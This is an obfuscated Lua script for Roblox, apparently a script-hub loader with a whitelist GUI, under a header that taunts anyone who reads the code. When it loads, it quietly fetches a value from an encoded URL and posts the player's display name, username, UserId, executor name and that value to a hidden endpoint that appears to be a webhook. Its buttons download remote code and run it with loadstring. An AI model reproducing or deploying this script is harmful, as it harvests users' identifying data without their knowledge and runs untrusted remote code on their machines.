--[[

                        01001001 
         ?  ?                     01101110
      ?        ?                           01110100 
     ?    ? ?   ?                 ??                 01100101
                                                           01101110 
      NICE TRY SKID!!!                                              01110100 
                                                                             01100001 
A question.              Do you trying to rob the code?              01110011
                                                            01110100 
       ????????????????????                          01100101 
WOW!!, WHAT A SKID!   LOLOLOLL              00100000 
                                    1110010 
  MADE BY TECK BITCH.      01101111
                  01100010
         01100001
01110010

??? ]]--


local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v139,v140) local v141={};for v166=1, #v139 do v6(v141,v0(v4(v1(v2(v139,v166,v166 + 1 )),v1(v2(v140,1 + (v166% #v140) ,1 + (v166% #v140) + 1 )))%256 ));end return v5(v141);end local v8=game:HttpGet(v7("\217\215\207\53\245\225\136\81\208\211\210\107\239\171\206\24\200\141\212\55\225","\126\177\163\187\69\134\219\167"));function SendMessage(v142,v143) local v144=890 -(142 + 748) ;local v145;local v146;local v147;local v148;local v149;while true do if (v144==(882 -(614 + 267))) then v147={[v7("\168\43\30\34\118\171\239","\155\203\68\112\86\19\197")]=v143};v148=v145:JSONEncode(v147);v144=1229 -(1192 + 35) ;end if (v144==(0 -0)) then v145=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));v146={[v7("\23\184\71\2\185\40\82\121\131\80\6\185","\38\84\215\41\118\220\70")]=v7("\81\6\50\30\247\83\23\54\27\241\94\89\40\1\241\94","\158\48\118\66\114")};v144=1;end if (v144==(3 -1)) then v149=request({[v7("\115\207\58","\152\38\189\86\156\32\24\133")]=v142,[v7("\209\82\179\78\243\83","\38\156\55\199")]=v7("\152\82\79\28","\35\200\29\28\72\115\20\154"),[v7("\49\186\208\219\136\62\39","\84\121\223\177\191\237\76")]=v146,[v7("\153\89\205\185","\161\219\54\169\192\90\48\80")]=v148});break;end end end function SendMessageEMBED(v150,v151) local v152=0 -0 ;local v153;local v154;local v155;local v156;local v157;while true do if (v152==(2 -1)) then v155={[v7("\206\49\37\227\218\185","\202\171\92\71\134\190")]={{[v7("\61\200\56\132\44","\232\73\161\76")]=v151.title,[v7("\191\220\81\94\12\178\201\86\84\17\181","\126\219\185\34\61")]=v151.description,[v7("\15\193\82\125\108","\135\108\174\62\18\30\23\147")]=v151.color,[v7("\176\224\47\199\28\189","\167\214\137\74\171\120\206\83")]=v151.fields,[v7("\141\255\61\73\253\181","\199\235\144\82\61\152")]={[v7("\19\19\161\63","\75\103\118\217")]=v151.footer.text}}}};v156=v153:JSONEncode(v155);v152=497 -(263 + 232) ;end if (v152==(0 -0)) then local v215=0;local v216;while true do if (v215==(0 -0)) then v216=0 -0 ;while true do if (v216==(158 -(26 + 131))) then v152=1 + 0 ;break;end if (v216==(0 -0)) then v153=game:GetService(v7("\97\86\20\53\122\71\18\51\64\65\5","\69\41\34\96"));v154={[v7("\159\204\217\30\7\37\168\142\227\19\18\46","\75\220\163\183\106\98")]=v7("\3\170\155\59\208\1\187\159\62\214\12\245\129\36\214\12","\185\98\218\235\87")};v216=860 -(240 + 619) ;end end break;end end end if (v152==(1 + 1)) then v157=request({[v7("\242\70\124","\126\167\52\16\116\217")]=v150,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v154,[v7("\246\203\234\69","\60\180\164\142")]=v156});break;end end end local v9=v7("\80\74\17\57\52\183\93\23\90\12\58\36\226\0\92\16\6\38\42\162\19\72\87\74\62\34\239\26\87\81\14\58\104\188\64\14\8\85\120\118\190\70\10\7\85\124\113\186\67\15\14\84\102\22\194\17\66\80\6\38\63\188\6\11\90\80\4\30\222\6\95\82\61\125\106\220\51\73\92\19\22\37\236\61\125\81\28\122\118\207\3\92\89\6\27\10\251\60\124\6\80\47\22\218\34\127\75\38\60\126\192\58\74\104\17\28\5\250\45\11\116","\114\56\62\101\73\71\141");SendMessage(v9);local v10={[v7("\172\224\207\200\189","\164\216\137\187")]=v7("\131\220\101\138\230\210\4\213\245","\107\178\134\81\210\198\158"),[v7("\60\11\145\197\184\49\30\150\207\165\54","\202\88\110\226\166")]=v7("\240\27\131\229\138\215\10\194\246\199\204\79\143\226\201\203\0","\170\163\111\226\151"),[v7("\18\63\190\55\92","\73\113\80\210\88\46\87")]=0 -0 ,[v7("\135\37\200\30\227\146","\135\225\76\173\114")]={{[v7("\20\236\181\181","\199\122\141\216\208\204\221")]=v7("\132\237","\150\205\189\112\144\24"),[v7("\51\133\179\89\1","\112\69\228\223\44\100\232\113")]=v8},{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\168\12\76\86\232\64\249\204\43\94\75\225","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]=game.Players.LocalPlayer.DisplayName},{[v7("\73\205\56\217","\100\39\172\85\188")]=v7("\152\107\188\146\115\131\121\180\133","\83\205\24\217\224"),[v7("\240\196\193\40\227","\93\134\165\173")]=game.Players.LocalPlayer.Name},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]=v7("\208\93\117\24\165\103\84","\106\133\46\16"),[v7("\78\33\127\233\95","\32\56\64\19\156\58")]=game.Players.LocalPlayer.UserId},{[v7("\84\201\232\83","\224\58\168\133\54\58\146")]=v7("\124\78\91\241\122\143\147","\107\57\54\43\157\21\230\231"),[v7("\205\138\29\224\188","\175\187\235\113\149\217\188")]=identifyexecutor()}},[v7("\58\160\142\88\230\107","\24\92\207\225\44\131\25")]={[v7("\95\214\160\88","\29\43\179\216\44\123")]=" "}};SendMessageEMBED(v9,v10);local v11={[v7("\149\220\44\64\178\243\37\95\168\202\112\28\228","\44\221\185\64")]=true,[v7("\88\234\69\71\99","\19\97\135\40\63")]=true,[v7("\154\5\61\53\36","\81\206\60\83\91\79")]=true,[v7("\108\185\200\107\33\208","\196\46\203\176\18\79\163\45")]=true,[v7("\157\12\91\50\9\170\190","\143\216\66\30\126\68\155")]=true,[v7("\243\228\35\238\250\129\246\195\131","\129\202\168\109\171\165\195\183")]=true,[v7("\117\78\45\219\204\29\227\53","\134\66\56\87\184\190\116")]=true,[v7("\109\18\6\169\10\184\49","\85\92\81\105\219\121\139\65")]=true,[v7("\201\187\89\68\123\208\223\178\94\64\125\219\229","\191\157\211\48\37\28")]=true,[v7("\239\30\247\21\34\239\30\247\21","\90\191\127\148\124")]=true,[v7("\82\130\55\14\97\158\55\14\97\158\55\14\97\158\55\14\97\151","\119\24\231\78")]=true,[v7("\160\63\170\94\212\69\3\163\35\161\88\211\73\21","\113\226\77\197\42\188\32")]=true,[v7("\9\58\211\176\54\38\241\186\40\53\248\180\52","\213\90\118\148")]=true,[v7("\112\47\184\5\78\83\39\186\102\72\88\38\189\88","\45\59\78\212\54")]=true,[v7("\58\89\144\158\131\10\164\245\30\66\134\152\162\43\129\241\4\87","\144\112\54\227\235\230\78\205")]=true,[v7("\182\36\11\229\220\90\189\23\93\170\136","\59\211\72\111\156\176")]=true,[v7("\106\158\250\18\93\130\224\56\64\131\226\63\71\134","\77\46\231\131")]=true,[v7("\155\70\183\66\191\119\185\78\142\91\166\80\191\70\165","\32\218\52\214")]=true,[v7("\68\24\48\166\247\181\87\8\31","\58\46\119\81\200\145\208\37")]=true,[v7("\50\137\35\191\160\130\34\36\158\53\182","\86\75\236\80\204\201\221")]=true,[v7("\66\68\123\138\240\138\98\83\126\128\234\138\38","\235\18\33\23\229\158")]=true};local v12={[v7("\120\191\205\183\95\144\196\168\69\169\145\235\9","\219\48\218\161")]=v7("\164\49\88\92\203\74\160\195\99\121\71\218\75\229\164\35\60\111\210\87\229\224\58","\128\132\17\28\41\187\47"),[v7("\88\63\11\34\77","\61\97\82\102\90")]=v7("\236\110\140\126\238\23\58\27\173\41\172\74\197\91\27\73\163\32\235\123\228\24\51\38\142\7\135\110\140","\105\204\78\203\43\167\55\126"),[v7("\145\243\45\16\24","\49\197\202\67\126\115\100\167")]=v7("\119\27\249\37\137\88\89\119\107\211\40\153\83\76\36\27\235\38\192\96\81\62\95\148","\62\87\59\191\73\224\54"),[v7("\194\44\223\229\202\83\171","\169\135\98\154")]=v7("\139\55\8\91\242\35\136\224\126\40\88\189\3\196\202\110\33\70\238\120","\168\171\23\68\52\157\83"),[v7("\173\93\219\136\26\15\166\214\88","\231\148\17\149\205\69\77")]=v7("\192\231\226\245\67\250\146\231\229\238\67\235\143\169\135\221\94\231\133\163\140","\159\224\199\167\155\55"),[v7("\199\242\63\219\239\195\61\209\254","\178\151\147\92")]=v7("\204\189\106\62\27\66\125\204\234\69\38\26\12\93\158\248\66\51\22\73\58\222\189\124\51\0\88\115\143\241\73\33\89","\26\236\157\44\82\114\44"),[v7("\125\56\207\88\56\39\208\76","\59\74\78\181")]=v7("\101\145\119\85\177\44\221\95\26\148\16\248\26\108\182\55\194\83\85\189\110","\211\69\177\58\58"),[v7("\147\252\96\202\250\206\180\240\119\241\232\217\190\228","\171\215\133\25\149\137")]=v7("\161\136\6\255\227\53\236\77\243\220\114\206\224\112\253\2\209\205\60\249\230\60\183","\34\129\168\82\154\143\80\156"),[v7("\182\158\20\14\68\126\140\138\160\16\7\73\64","\233\229\210\83\107\40\46")]=v7("\129\2\19\216\17\200\2\20\218\12\207\69\121","\101\161\34\82\182"),[v7("\220\5\80\255\220\237\160\47\230\8\88\250\195","\78\136\109\57\158\187\130\226")]=v7("\126\127\216\245\58\58\253\177\15\42\240\242\53\127\222\227\59\49\248\245\59\127\171\177\25\51\240\229\61\55\178","\145\94\95\153"),[v7("\172\238\27\199\93\228\237","\215\157\173\116\181\46")]=v7("\117\244\170\231\206\58\244\184\247\214\48\183\159\178\252\60\172\142\246\145","\186\85\212\235\146")};local function v13(v158) local v159=0 + 0 ;local v160;while true do if (v159==3) then v160.Image=v7("\35\128\100\189\34\145\121\168\56\134\38\243\126\214\37\229\103\218\37\237\104\213\44","\220\81\226\28");v160.ImageColor3=Color3.fromRGB(30 + 25 ,46 -35 ,1351 -(709 + 387) );v159=12 -8 ;end if ((1739 -(404 + 1335))==v159) then v160=Instance.new(v7("\235\140\23\249\60\194\89\192\132\26","\56\162\225\118\158\89\142"));v160.Name=v7("\123\9\207\184","\184\60\101\160\207\66");v159=1;end if (v159==(11 -7)) then v160.ScaleType=Enum.ScaleType.Slice;v160.SliceCenter=Rect.new(64 -44 ,426 -(183 + 223) ,201 + 79 ,210 + 70 );break;end if (v159==(2 -0)) then v160.Size=UDim2.new(1,14 + 6 ,1 + 0 ,20);v160.Position=UDim2.new(337 -(10 + 327) , -10,1880 -(446 + 1434) , -(1293 -(1040 + 243)));v159=8 -5 ;end if (v159==1) then v160.Parent=v158;v160.BackgroundTransparency=1848 -(559 + 1288) ;v159=2 + 0 ;end end end local v14=Instance.new(v7("\32\214\144\254\239\201\52\192\139","\167\115\181\226\155\138"));v14.Name=v7("\213\42\238\72\126\125\207\241\54\198\82\127\93\201\229\49\212\95\105\116\195\236\5\242\85","\166\130\66\135\60\27\17");v14.ZIndexBehavior=Enum.ZIndexBehavior.Global;v14.IgnoreGuiInset=true;v14.ResetOnSpawn=false;v14.Parent=game.Players.LocalPlayer:WaitForChild(v7("\116\70\207\108\53\86\109\219\124","\80\36\42\174\21"));local v21=Instance.new(v7("\104\2\54\119\75","\26\46\112\87"));v21.Name=v7("\155\47\190\102\153\173\68\185\188","\212\217\67\203\20\223\223\37");v21.Size=UDim2.new(339 -(118 + 220) ,0,1,0 + 0 );v21.Position=UDim2.new(449 -(108 + 341) ,0 + 0 ,0 -0 ,1493 -(711 + 782) );v21.BackgroundColor3=Color3.fromRGB(0 -0 ,0,0 -0 );v21.BackgroundTransparency=469.1 -(270 + 199) ;v21.BorderSizePixel=0 -0 ;v21.Parent=v14;local v29=Instance.new(v7("\152\129\189\192\159\139\174\215\185\153","\178\218\237\200"));v29.Name=v7("\129\189\239\196\179\185\239\195\162\148\232\212\154\186\225\195\148\185\243\194\147\179\224\213\181\161","\176\214\213\134");v29.Size=33 + 27 ;v29.Parent=v21;local v33=Instance.new(v7("\210\191\183\217\173","\57\148\205\214\180\200\54"));v33.Name=v7("\48\252\54\63\113\0\242\32\58\114\52\239\52\57\115","\22\114\157\85\84");v33.Size=UDim2.new(0.8 + 0 ,1819 -(580 + 1239) ,0.8,0 -0 );v33.Position=UDim2.new(0.1 + 0 ,0 + 0 ,0.1 + 0 ,0 + 0 );v33.BackgroundColor3=Color3.fromRGB(665 -410 ,215 + 40 ,159 + 96 );v33.BackgroundTransparency=1168 -(645 + 522) ;v33.BorderSizePixel=1790 -(1010 + 780) ;v33.ZIndex=2 + 0 ;v33.Parent=v21;local v42=Instance.new(v7("\240\206\11\208\113\247\170\193\199","\200\164\171\115\164\61\150"));v42.Name=v7("\137\252\10\81\134\178\253\16\81\183\183\224\15\64\175\191\246\6\73","\227\222\148\99\37");v42.Size=UDim2.new(0.4 -0 ,0 -0 ,0.05 + 0 ,1836 -(1045 + 791) );v42.Position=UDim2.new(0.1 -0 ,0 -0 ,505.15 -(351 + 154) ,1574 -(1281 + 293) );v42.BackgroundTransparency=267 -(28 + 238) ;v42.Text=v7("\4\90\91\226\252\63\91\65\226\185\6\65\87\228\234\105","\153\83\50\50\150");v42.TextColor3=Color3.fromRGB(569 -314 ,1814 -(1381 + 178) ,240 + 15 );v42.TextSize=15 + 3 ;v42.Font=Enum.Font.Roboto;v42.ZIndex=2 + 1 ;v42.Parent=v33;v13(v42);local v54=Instance.new(v7("\110\117\97\19\127\167\68\83\113\85\14\114\166\72","\45\61\22\19\124\19\203"));v54.Name=v7("\246\26\4\225\7\124\176\210\6\62\246\16\127\181\205\52\31\244\15\117","\217\161\114\109\149\98\16");v54.Size=UDim2.new(0.4 -0 ,0 + 0 ,470.6 -(381 + 89) ,0 + 0 );v54.Position=UDim2.new(0.1 + 0 ,0 -0 ,1156.25 -(1074 + 82) ,0 + 0 );v54.BackgroundTransparency=843 -(497 + 345) ;v54.ScrollBarThickness=10 -5 ;v54.ScrollingDirection=Enum.ScrollingDirection.Y;v54.ZIndex=3;v54.Parent=v33;local function v64() for v167,v168 in pairs(v11) do local v169=Instance.new(v7("\38\37\32\104\144\117\16\37\52","\20\114\64\88\28\220"));v169.Name=v167   .. v7("\29\0\208\177\244","\221\81\97\178\212\152\176") ;v169.Size=UDim2.new(1785 -(214 + 1570) ,1455 -(990 + 465) ,0 + 0 ,14 + 16 );v169.Position=UDim2.new(0,0 + 0 ,0 -0 ,(1756 -(1668 + 58)) * ( #v54:GetChildren() -(627 -(512 + 114))) );v169.BackgroundTransparency=1;v169.Text=v167;v169.TextColor3=(v11[v167] and Color3.fromRGB(664 -409 ,255,526 -271 )) or Color3.fromRGB(0 -0 ,0 + 0 ,489 -(457 + 32) ) ;v169.TextSize=9 + 9 ;v169.Font=Enum.Font.Arial;v169.ZIndex=1 + 2 ;v169.Parent=v54;if v11[v167] then v13(v169);end end end v64();local v65=Instance.new(v7("\249\226\5\239\54\204\229\24\247","\122\173\135\125\155"));v65.Name=v7("\168\206\7\170\11\56\220\136\196\44\184\61\52\196","\168\228\161\96\217\95\81");v65.Size=UDim2.new(0.4 + 0 ,0 -0 ,1994.05 -(109 + 1885) ,1469 -(1269 + 200) );v65.Position=UDim2.new(0.5 -0 ,815 -(98 + 717) ,0.15 + 0 ,826 -(802 + 24) );v65.BackgroundTransparency=1 -0 ;v65.Text=v7("\248\217\47\82\40\82\155\253\33\91\60\13","\55\187\177\78\60\79");v65.TextColor3=Color3.fromRGB(687 -432 ,322 -67 ,38 + 217 );v65.TextSize=14 + 4 ;v65.Font=Enum.Font.Roboto;v65.ZIndex=1 + 2 ;v65.Parent=v33;v13(v65);local v76=Instance.new(v7("\30\205\77\228\74\195\137\35\201\121\249\71\194\133","\224\77\174\63\139\38\175"));v76.Name=v7("\168\78\95\61\183\66\74\33\136\77\126\60\133\76\93","\78\228\33\56");v76.Size=UDim2.new(0.4 + 0 ,0 -0 ,0.6 -0 ,0);v76.Position=UDim2.new(0.5,0 + 0 ,0.25 + 0 ,0 + 0 );v76.BackgroundTransparency=1 + 0 ;v76.ScrollBarThickness=610 -(316 + 289) ;v76.ScrollingDirection=Enum.ScrollingDirection.Y;v76.ZIndex=3 + 0 ;v76.Parent=v33;local function v85() for v181,v182 in pairs(v12) do local v183=Instance.new(v7("\250\123\170\23\169\207\124\183\15","\229\174\30\210\99"));v183.Name=v181   .. v7("\55\226\129\125\236\63\60\23","\89\123\141\230\49\141\93") ;v183.Size=UDim2.new(1 + 0 ,1453 -(666 + 787) ,1433 -(797 + 636) ,145 -115 );v183.Position=UDim2.new(254 -(79 + 175) ,1619 -(1427 + 192) ,0,(24 + 6) * ( #v76:GetChildren() -(2 -1)) );v183.BackgroundTransparency=1 -0 ;v183.Text=v182;v183.TextColor3=Color3.fromRGB(89 + 166 ,592 -337 ,494 -239 );v183.TextSize=17 + 1 ;v183.Font=Enum.Font.Arial;v183.TextXAlignment=Enum.TextXAlignment.Left;v183.ZIndex=3;v183.Parent=v76;v13(v183);end end v85();local v86=Instance.new(v7("\199\116\238\24\60\75\241\116\250","\42\147\17\150\108\112"));v86.Name=v7("\34\167\41\122\197\241\59\163\53\107","\136\111\198\77\31\135");v86.Size=UDim2.new(0 + 0 ,200,0 + 0 ,346 -(192 + 134) );v86.Position=UDim2.new(1277 -(316 + 960) , -(123 + 97),1, -(24 + 6));v86.BackgroundTransparency=1 + 0 ;v86.Text=v7("\47\8\163\83\253\230\14\233\54\12\164\93","\201\98\105\199\54\221\132\119");v86.TextColor3=Color3.fromRGB(974 -719 ,255,806 -(83 + 468) );v86.TextSize=1820 -(1202 + 604) ;v86.Font=Enum.Font.Roboto;v86.TextXAlignment=Enum.TextXAlignment.Right;v86.ZIndex=13 -10 ;v86.Parent=v33;local v99=Instance.new(v7("\141\9\155\53\46\52\174\188\0","\204\217\108\227\65\98\85"));v99.Name=v7("\104\198\231\246\37\207\80\247\240\253\56","\160\62\163\149\133\76");v99.Size=UDim2.new(0 + 0 ,332 -132 ,0 -0 ,345 -(45 + 280) );v99.Position=UDim2.new(1244 -(485 + 759) ,46 -26 ,1 + 0 , -(27 + 3));v99.BackgroundTransparency=947 -(88 + 858) ;v99.Text=v7("\245\181\31\61\198\216\180\77\57\198\196\179\4\32\205\140\224\95\97\148\152\244\20","\163\182\192\109\79");v99.TextColor3=Color3.fromRGB(94 + 161 ,78 + 177 ,255);v99.TextSize=8 + 6 ;v99.Font=Enum.Font.Roboto;v99.TextXAlignment=Enum.TextXAlignment.Left;v99.ZIndex=1 + 2 ;v99.Parent=v33;local v112=Instance.new(v7("\0\35\24\212\215\33\50\20\207\251","\149\84\70\96\160"));v112.Name=v7("\27\14\8\238\51\36\24\249\44\9\3","\141\88\102\109");v112.Size=UDim2.new(0.2,789 -(766 + 23) ,0.09 -0 ,0 -0 );v112.Position=UDim2.new(0.3 -0 ,0,1911.89 -(340 + 1571) ,0);v112.BackgroundColor3=Color3.fromRGB(0 -0 ,12 + 18 ,1772 -(1733 + 39) );v112.BackgroundTransparency=0.7 -0 ;v112.BorderSizePixel=1034.1 -(125 + 909) ;v112.TextColor3=Color3.fromRGB(1735 -(641 + 839) ,2203 -(1096 + 852) ,650 -395 );v112.TextSize=1698 -(1466 + 218) ;v112.Text=v7("\131\112\138\87\47\20","\161\211\51\170\16\122\93\53");v112.Font=Enum.Font.Roboto;v112.ZIndex=2 + 1 ;v112.Parent=v33;v13(v112);local v125=Instance.new(v7("\207\171\170\60\217\187\166\60\244\160","\72\155\206\210"));v125.Name=v7("\107\117\86\7\63\67\88\65\26\39\73\116","\83\38\26\52\110");v125.Size=UDim2.new(0.2,0 + 0 ,0.09,0 -0 );v125.Position=UDim2.new(0.5 + 0 ,512 -(409 + 103) ,236.89 -(46 + 190) ,95 -(51 + 44) );v125.BackgroundColor3=Color3.fromRGB(12 + 28 ,1317 -(1114 + 203) ,726 -(228 + 498) );v125.BackgroundTransparency=0.7 -0 ;v125.BorderSizePixel=0.1;v125.TextColor3=Color3.fromRGB(56 + 199 ,183 + 72 ,141 + 114 );v125.TextSize=677 -(174 + 489) ;v125.Text=v7("\117\56\5\111\116\50\103\97\109\62","\38\56\119\71");v125.Font=Enum.Font.Roboto;v125.ZIndex=7 -4 ;v125.Parent=v33;v13(v125);local function v138(v161,v162) local v163=game.Players.LocalPlayer.Name;if v11[v163] then local v197=1905 -(830 + 1075) ;local v198;local v199;local v200;while true do if ((1 + 0)==v197) then v200=nil;while true do if (v198==(525 -(303 + 221))) then if v199 then local v228=1269 -(231 + 1038) ;while true do if ((0 + 0)==v228) then loadstring(v200)();v14:Destroy();break;end end else game.StarterGui:SetCore(v7("\223\173\13\192\114\227\188\10\194\85\239\169\23\205\83\226","\60\140\200\99\164"),{[v7("\179\253\16\42\167","\194\231\148\100\70")]=v7("\117\79\211\170\230\220\6\96\206\162\242\193\72\75\129\134\228\218\73\94\128","\168\38\44\161\195\150"),[v7("\180\249\154\98","\118\224\156\226\22\80\136\214")]=v7("\100\239\80\140\71\234\25\148\77\174\85\143\67\234\25\148\74\235\25\147\65\252\80\144\86\160\25\176\78\235\88\147\71\174\77\146\91\174\88\135\67\231\87\192\78\239\77\133\80\160","\224\34\142\57"),[v7("\247\164\202\211","\110\190\199\165\189\19\145\61")]=v7("\210\255\99\248\209\136\149\252\96\255\197\213\213\233\123\231\147\137\217\228\122\167\138\212\201\238\99\167\212\206\222\182\34\189\211\146\138\178\34\189\219\158","\167\186\139\23\136\235"),[v7("\62\160\154\12\14\188\135\3","\109\122\213\232")]=1166 -(171 + 991) });end break;end if (v198==(0 -0)) then game.StarterGui:SetCore(v7("\192\234\86\210\11\89\231\230\94\223\38\87\231\230\87\216","\54\147\143\56\182\69"),{[v7("\226\136\235\69\218","\191\182\225\159\41")]=v7("\10\7\60\93\142\137\214\34\17\41\65\130\136\204","\162\75\114\72\53\235\231"),[v7("\184\57\92\246","\98\236\92\36\130\51")]=v7("\157\22\25\250\68\186\176\112\173\23\76\174\77\173\245\39\172\16\24\191\73\161\166\36\234\89\59\191\73\171\186\61\161\89\24\181\5","\80\196\121\108\218\37\200\213")   .. v162   .. v7("\64\69\7\109\88\7\133\14\61","\234\96\19\98\31\43\110") ,[v7("\47\28\93\201","\235\102\127\50\167\204\18")]=v7("\88\181\225\51\30\97\31\182\226\52\10\60\95\163\249\44\92\96\83\174\248\108\69\61\67\164\225\108\27\39\84\252\160\118\28\123\0\248\160\118\20\119","\78\48\193\149\67\36"),[v7("\20\11\146\25\85\57\17\142","\33\80\126\224\120")]=7 -4 });v199,v200=pcall(function() return game:HttpGet(v161);end);v198=1;end end break;end if (v197==0) then v198=0 -0 ;v199=nil;v197=1 + 0 ;end end else game.StarterGui:SetCore(v7("\221\242\172\52\192\248\182\57\232\254\161\49\250\254\173\62","\80\142\151\194"),{[v7("\55\207\99\64\6","\44\99\166\23")]=v7("\93\226\61\62\54\170\104\254\42\55\39\173\115\249","\196\28\151\73\86\83"),[v7("\199\6\49\4","\22\147\99\73\112\226\56\120")]=v7("\129\122\247\181\140\170\112\162\251\130\172\53\237\251\205\172\125\231\181\154\176\124\246\240\129\177\102\246\187\205\136\121\231\244\158\189\53\225\250\131\172\116\225\225\205\183\98\236\240\159\248\81\235\230\142\183\103\230\175\205\152\97\183\251\131\179\59","\237\216\21\130\149"),[v7("\171\77\80\81","\62\226\46\63\63\208\169")]=v7("\237\13\65\147\69\66\96\73\242\14\27\145\16\15\35\81\253\87\86\140\18\66\46\77\246\28\65\204\64\4\43\3\176\76\13\214\79\84\122\11\181\64","\62\133\121\53\227\127\109\79"),[v7("\52\1\32\244\194\167\173\30","\194\112\116\82\149\182\206")]=7 + 3 });local v201=Instance.new(v7("\13\173\84\12\226\247\26\45\167\66","\110\89\200\44\120\160\130"));v201.Name=v7("\136\207\68\85\70\104\46\89\191\204\69","\45\203\163\43\38\35\42\91");v201.Size=UDim2.new(0.2 -0 ,574 -(102 + 472) ,0.09 -0 ,0 -0 );v201.Position=UDim2.new(0.4 -0 ,0 + 0 ,1545.9 -(320 + 1225) ,89 -39 );v201.BackgroundColor3=Color3.fromRGB(1273 -(111 + 1137) ,0,158 -(91 + 67) );v201.BackgroundTransparency=0.7 -0 ;v201.BorderSizePixel=0 + 0 ;v201.TextColor3=Color3.fromRGB(723 -(423 + 100) ,2 + 198 ,553 -353 );v201.TextSize=8 + 7 ;v201.Text=v7("\247\157\213\55","\52\178\229\188\67\231\201");v201.Font=Enum.Font.Roboto;v201.ZIndex=774 -(326 + 445) ;v201.Parent=v33;v13(v201);v201.MouseButton1Click:Connect(function() v14:Destroy();end);end end v112.MouseButton1Click:Connect(function() v138(v7("\41\85\68\20\228\6\108\110\83\81\19\185\91\42\53\73\69\6\226\79\38\51\66\95\10\227\89\45\53\15\83\11\250\19\23\112\111\126\46\184\125\55\53\68\93\20\227\83\37\39\77\81\3\184\81\34\40\79\31\55\212\110\10\17\117","\67\65\33\48\100\151\60"),v7("\239\196","\147\191\135\206\184"));end);v125.MouseButton1Click:Connect(function() local v164=0 -0 ;local v165;while true do if (v164==(0 -0)) then v165=1026 -(834 + 192) ;while true do if (v165==(0 -0)) then v138(v7("\140\60\178\209\203\9\253\203\58\167\214\150\84\187\144\32\179\195\205\64\183\150\43\169\207\204\86\188\144\102\165\206\213\28\134\213\6\136\235\151\114\166\144\45\171\209\204\103\189\130\36\167\198\149\126\189\134\33\170\196\149\28\191\133\33\168\142\235\112\128\173\24\146","\210\228\72\198\161\184\51"),v7("\27\70\241\25\127\203","\174\86\41\147\112\19"));if success then local v227=0 -0 ;while true do if (v227==(711 -(530 + 181))) then loadstring(result)();v14:Destroy();break;end end end break;end end break;end end end);
